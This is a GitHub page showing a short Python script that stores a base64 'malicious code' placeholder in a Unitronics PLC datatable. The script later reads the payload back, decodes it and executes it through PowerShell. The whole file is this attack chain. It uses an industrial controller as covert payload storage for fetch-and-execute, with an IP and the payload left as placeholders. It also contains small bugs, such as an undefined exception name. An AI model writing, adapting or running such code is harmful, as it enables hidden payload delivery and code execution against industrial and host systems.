-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathunitronic_upload_code.py
47 lines (40 loc) · 1.42 KB
/
unitronic_upload_code.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
from pcom import commands
from pcom.plc import EthernetPlc
import os
import base64
import subprocess, sys
with EthernetPlc(address=('<<IP>>', 20256)) as plc:
table_structure = commands.datatables.DatatableStructure("My table", offset=19000, rows=1, columns=[
commands.datatables.String(20),
commands.datatables.Int(),
commands.datatables.Int(),
commands.datatables.Int(),
commands.datatables.Int(),
commands.datatables.Int(),
])
rows = [
["<<Malicious_CODE_B64>>", [0], [0], [0], [0], [0]],
]
c = commands.datatables.WriteDatatable(structure=table_structure, data=rows)
try:
plc.send(c)
except datatables.WriteDatatableError as ex:
print(ex)
plc = EthernetPlc(address=('<<IP>>', 20256))
try:
plc.connect()
# Leer Tablas
table_structure = commands.datatables.DatatableStructure("My table", offset=19000, rows=50, columns=[
commands.datatables.String(4),
])
c = commands.datatables.ReadDatatable(structure=table_structure)
res = plc.send(c)
print(res)
#print(res[0][0][0])
res_malicious=base64.b64decode(str(res[0][0]+res[1][0]+res[2][0]+res[4][0]+res[5][0])).decode('ascii')
print(res_malicious)
p = subprocess.Popen(["powershell", res_malicious], stdout=subprocess.PIPE)
print(p.communicate())
finally:
print("final")
plc.close()